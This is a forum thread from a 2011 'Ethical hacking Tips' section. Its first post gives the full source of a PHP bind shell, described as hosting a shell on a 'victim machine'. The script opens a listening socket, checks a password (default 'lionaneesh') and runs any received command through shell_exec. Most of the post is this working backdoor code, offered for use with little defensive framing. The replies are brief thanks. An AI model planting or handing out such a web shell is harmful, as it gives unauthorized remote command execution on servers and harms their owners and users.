1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Bind Shell in PHP - With Authentication Feature

Discussion in 'Ethical hacking Tips' started by lionaneesh, Oct 5, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Bind Shell as the name suggests is a piece of code , which is used to host a shell on a server or a victim machine ! Its basically used to control the host machine remotely!

    In this tutorial we'll be making a Bind Shell in PHP with a authentication feature for extra protection.

    The Code



    PHP:
    <?php

    /*********************

    @@author : lionaneesh
    @@facebook : facebook.com/lionaneesh
    @@Email : lionaneesh@gmail.com

    ********************/

    ?>

    <html>
    <head>
        <title>Bind Shell -- PHP</title>
    </head>

    <body>

    <h1>Welcome to Bind Shell Control Panel </h1>

    <p> Fill in the form Below to Start the Bind Shell Service </p>

    <?php
    if( isset($_GET['port']) &&
        isset(
    $_GET['passwd']) && 
        
    $_GET['port'] != "" &&
        
    $_GET['passwd'] != "" 
        
    )
        {
            
    $address '127.0.0.1'// As its a bind shell it will always host on the local machine
            
            // Set the ip and port we will listen on
            
            
    $port $_GET['port'];
            
    $pass $_GET['passwd'];
            
    // Set time limit to indefinite execution
            
    set_time_limit (0);

            if(
    function_exists("socket_create"))
            {
            
    // Create a TCP Stream socket
            
    $sockfd socket_create(AF_INETSOCK_STREAMSOL_TCP);

          
            
    // Bind the socket to an address/port
            
            
            
    if(socket_bind($sockfd$address$port) == FALSE)
            {
                echo 
    "Cant Bind to the specified port and address!";
            }
            
    // Start listening for connections
            
    socket_listen($sockfd,15);
            
        
            
    $passwordPrompt 
    "\n=================================================================\n
    PHP Bind Shell\n
    \n
    @@author : lionaneesh\n
    @@facebook : facebook.com/lionaneesh\n
    @@Email : lionaneesh@gmail.com\n
    \n
    =================================================================\n\n

    Please Enter Password : "
    ;
            
            
    /* Accept incoming requests and handle them as child processes */
            
    $client socket_accept($sockfd);
            

            
    socket_write($client $passwordPrompt);
            
            
    // Read the pass from the client
            
            
    $input socket_read($clientstrlen($pass) + 2); // +2 for \r\n
            
    if(trim($input) == $pass)
            {
                
    socket_write($client "\n\n");
                
    socket_write($client shell_exec("date /t & time /t")  . "\n" shell_exec("ver") . shell_exec("date") . "\n" shell_exec("uname -a"));
                
    socket_write($client "\n\n");
                while(
    1)
                {
                    
    // Print Command prompt
                    
    $commandPrompt ="(Bind-Shell)[$]> ";
                    
    $maxCmdLen 31337;
                    
    socket_write($client,$commandPrompt);
                    
    $cmd socket_read($client,$maxCmdLen);
                    if(
    $cmd == FALSE)
                    {
                        echo 
    "The client Closed the conection!";
                        break;
                    }
                    
    socket_write($client shell_exec($cmd));
                }
            }
            else
            {
                echo 
    "Wrong Password!";
                
    socket_write($client"Wrong Password , Please try again \n\n");
            }
            
    socket_shutdown($client2);
            
    socket_close($socket);
            }
            else
            {
                echo 
    "Socket Conections not Allowed/Supported by the server! <br />";
            }
        }
        else
        {
        
    ?>
        <table align="center" >
             <form method="GET">
             <td>
                <table style="border-spacing: 6px;">
                    <tr>
                        <td>Port</td>
                        <td>
                            <input style="width: 200px;" name="port" value="31337" />
                        </td>
                    </tr>
                    <tr>
                        <td>Passwd </td>
                        <td><input style="width: 100px;" name="passwd" size='5' value="lionaneesh"/>
                    </tr>
                    <tr>
                    <td>
                    <input style="width: 90px;" class="own" type="submit" value="Bind :D!"/>
                    </td>
                    </tr>    
                       
                </table>
             </td>
             </form>
        </tr>
        </table>
        <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
    <?php
        
    }
    ?>

    Using



    The Bind Shell is implemented to be simple to understand and easy to use! The Introduction page is quite self explanatory and will tell you everything you need to know!

    Here is a Screen Shot of its working :-

    [​IMG]

    Enjoy !!!
     
  2. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Re: Shell in PHP - With Authentication Feature

    Thanks for accepting! Please Check your Visitor Messages!
     
  3. phpcrazy

    phpcrazy New Member

    Joined:
    Dec 26, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    myanmar
    Home Page:
    yes bro i am going to study all of your article
     

Share This Page